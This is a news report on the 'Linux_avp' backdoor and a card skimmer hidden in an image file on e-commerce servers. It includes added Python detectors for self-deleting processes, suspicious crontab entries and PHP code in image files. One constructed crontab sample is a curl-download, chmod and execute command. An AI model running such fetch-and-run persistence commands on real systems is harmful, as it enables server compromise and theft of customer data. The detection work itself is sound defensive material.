Researchers at the Sansec Threat Research Team have discovered a new malicious agent, “Linux_avp”, which hides as a system process on e-commerce servers. They said attackers began using the malware worldwide last week and that it takes its commands from a control server in Beijing.
In the campaign, the attackers launched automated attack probes against the store and tested dozens of vulnerabilities in popular online shop platforms.
“After a day and a half, the attacker found a vulnerability while uploading files in one of the store’s plugins. He/she then uploaded a webshell and modified the server code to intercept customer data,” the researchers said.
Researchers said the attackers then uploaded malware called linux_avp, a Golang program that, once started, removes itself from the hard drive and disguises itself as a fake ps -ef process.
“Analysis of linux_avp suggests that it is acting as a back door, waiting for commands from a server hosted in Beijing (Alibaba),” the researchers said. The back door itself also revealed that a user known as “dob” created it in a project folder named lin_avp, codenamed GREECE.
The malware also installs a malicious crontab entry to retain access in case the process is removed or the server is restarted. The crontab downloads the Golang executable into a random writable directory and installs two configuration files. “One contains a public key that is believed to be used to ensure that no one other than the malware owner can execute commands,” added the researchers.
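Two of the behaviours above leave traces a defender can check for on a Linux host: a binary that deletes itself from disk while running still shows up as "(deleted)" in the /proc/&lt;pid&gt;/exe link, and a process that fakes its name as "ps -ef" has an argv[0] that does not match its real executable. The following is an added example written for this article, not Sansec's tooling; the /proc records and crontab lines it tests are constructed, and the list of writable directories it treats as suspicious is an assumption based on the article's wording.

```python
"""Detect a running process that has unlinked its own binary and masquerades
as ``ps -ef``, and a crontab entry that re-downloads and runs an executable
from a writable directory. Added example; sample data is constructed."""
import os
import re

# Directories every local user can write to (assumption: the article only says
# "a random writable directory", so this list is a reasonable starting point).
WRITABLE_DIRS = ("/tmp", "/var/tmp", "/dev/shm")
FETCH_RE = re.compile(r"\b(curl|wget)\b")
# Either a chmod that grants execute, or a command chained after && ; | that
# runs a file out of one of the writable directories.
EXEC_RE = re.compile(r"chmod\s+\S*[x7]|(?:&&|;|\|)\s*(?:/tmp|/var/tmp|/dev/shm)/\S+")


def classify_process(exe_target: str, cmdline: bytes) -> list[str]:
    """Return findings for one process.

    exe_target is readlink(/proc/<pid>/exe); cmdline is the raw contents of
    /proc/<pid>/cmdline (NUL-separated argv)."""
    findings = []
    if exe_target.endswith(" (deleted)"):
        # Executable removed from disk while still running. Also seen after a
        # package upgrade replaces a running binary, so treat as a lead, not proof.
        findings.append("binary_deleted_on_disk")
        exe_target = exe_target[: -len(" (deleted)")]
    argv = [a for a in cmdline.split(b"\0") if a]
    if argv:
        argv0 = os.path.basename(argv[0].decode(errors="replace"))
        real = os.path.basename(exe_target)
        if argv0 != real:
            # argv[0] is under the process's own control; a mismatch with the
            # real executable is how a fake "ps -ef" shows up. Interpreters
            # started via symlink (python3 vs python3.11) also trigger this.
            findings.append(f"argv0_mismatch:{argv0}!={real}")
    return findings


def scan_proc(proc_root: str = "/proc") -> dict[int, list[str]]:
    """Walk a live /proc and return {pid: findings} for flagged processes."""
    results = {}
    for entry in os.listdir(proc_root):
        if not entry.isdigit():
            continue
        try:
            exe = os.readlink(f"{proc_root}/{entry}/exe")
            with open(f"{proc_root}/{entry}/cmdline", "rb") as fh:
                cmdline = fh.read()
        except (PermissionError, FileNotFoundError, ProcessLookupError):
            continue  # kernel threads, exited processes, other users' pids
        findings = classify_process(exe, cmdline)
        if findings:
            results[int(entry)] = findings
    return results


def suspicious_cron_lines(crontab_text: str) -> list[str]:
    """Flag crontab lines that download something and then run it from a
    writable directory, the persistence pattern described in the article."""
    flagged = []
    for line in crontab_text.splitlines():
        body = line.strip()
        if not body or body.startswith("#"):
            continue
        fetches = bool(FETCH_RE.search(body))
        uses_writable = any(d in body for d in WRITABLE_DIRS)
        runs = bool(EXEC_RE.search(body))
        if fetches and uses_writable and runs:
            flagged.append(body)
    return flagged


if __name__ == "__main__":
    # Constructed sample crontab (not from the incident); the URL is a placeholder.
    sample = (
        "# m h dom mon dow command\n"
        "0 3 * * * /usr/bin/certbot renew --quiet\n"
        "*/10 * * * * curl -s http://127.0.0.1:8000/x -o /tmp/.x && chmod +x /tmp/.x && /tmp/.x\n"
    )
    print(suspicious_cron_lines(sample))
    print(classify_process("/tmp/.x (deleted)", b"ps\0-ef\0"))
    for pid, hits in scan_proc().items():
        print(pid, hits)
```

Run it as root to see every process; as an unprivileged user /proc/&lt;pid&gt;/exe is unreadable for other users' processes and those pids are skipped. Feed it the output of `crontab -l` for each account plus the files under /etc/cron.d to cover system-wide entries.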
This case has another Chinese connection, according to the researchers: a line was added to the e-commerce platform’s code referencing app/design/frontend/favicon_absolute_top.jpg, a file containing PHP code that fetches a fake payment form and injects it into the store. The researchers said the IP address serving this form was hosted in Hong Kong and had previously been observed as a skimming exfiltration endpoint in July and August of this year.
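A PHP payload stored under an image name is a common way to evade a reviewer skimming a theme directory, and it only works if some PHP file includes the "image". The check below is an added example, not part of the Sansec write-up or any platform's own tooling: it flags files with an image extension whose first bytes are not an image header or which contain a PHP open tag, and PHP files that include or require an image-named file. The sample bytes are constructed.

```python
"""Scan a theme directory for PHP hidden in image-named files and for PHP
sources that include such a file. Added example; sample data is constructed."""
import os
import re

# Leading bytes expected for the image types a theme directory normally holds.
IMAGE_MAGIC = {
    ".jpg": (b"\xff\xd8\xff",),
    ".jpeg": (b"\xff\xd8\xff",),
    ".png": (b"\x89PNG\r\n\x1a\n",),
    ".gif": (b"GIF87a", b"GIF89a"),
    ".ico": (b"\x00\x00\x01\x00",),
}
PHP_TAG_RE = re.compile(rb"<\?(?:php\b|=)", re.IGNORECASE)
# include/require of a path ending in an image extension within a PHP source.
IMAGE_INCLUDE_RE = re.compile(
    rb"\b(?:include|require)(?:_once)?\s*\(?\s*[^;]*\.(?:jpe?g|png|gif|ico)\b",
    re.IGNORECASE,
)
PHP_EXTS = (".php", ".phtml")


def inspect_image_bytes(name: str, data: bytes) -> list[str]:
    """Findings for a file that claims, by extension, to be an image."""
    ext = os.path.splitext(name)[1].lower()
    magics = IMAGE_MAGIC.get(ext)
    if magics is None:
        return []
    findings = []
    if not data.startswith(magics):  # bytes.startswith accepts a tuple
        findings.append("bad_magic")
    m = PHP_TAG_RE.search(data)
    if m:
        # A real JPEG can carry arbitrary bytes in EXIF/comment segments, so a
        # hit here means "open it and look", not "confirmed malicious".
        findings.append(f"php_tag_at_offset_{m.start()}")
    return findings


def has_image_include(php_source: bytes) -> bool:
    """True if a PHP source includes/requires a file with an image extension."""
    return IMAGE_INCLUDE_RE.search(php_source) is not None


def scan_theme_dir(root: str) -> dict[str, list[str]]:
    """Walk root and return {path: findings} for every file worth reviewing."""
    results = {}
    for dirpath, _dirs, files in os.walk(root):
        for fname in files:
            path = os.path.join(dirpath, fname)
            ext = os.path.splitext(fname)[1].lower()
            try:
                with open(path, "rb") as fh:
                    data = fh.read()
            except OSError:
                continue
            findings = []
            if ext in IMAGE_MAGIC:
                findings = inspect_image_bytes(fname, data)
            elif ext in PHP_EXTS and has_image_include(data):
                findings = ["includes_image_named_file"]
            if findings:
                results[path] = findings
    return results


if __name__ == "__main__":
    # Constructed: a JPEG header followed by a PHP open tag.
    print(inspect_image_bytes("favicon_absolute_top.jpg", b"\xff\xd8\xff<?php echo 1; ?>"))
    print(has_image_include(b"<?php include 'app/design/frontend/favicon_absolute_top.jpg'; ?>"))
    print(scan_theme_dir("app/design"))
```

Run it against the platform's design or theme root; any hit on an image file that also has a matching include in a PHP or template file is the pairing the article describes and should be compared against a known-good copy of the codebase.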
Researchers said that at the time of writing, no other antivirus vendor had detected the malware.
“Strangely, an individual had submitted the same malware on Virustotal on October 8th with the note “test”. This was only one day after the successful break-in into our customer’s shop,” said the researchers.
They added that the person uploading the malware could very well be the malware writer who wanted to claim that popular antivirus engines fail to detect their creation.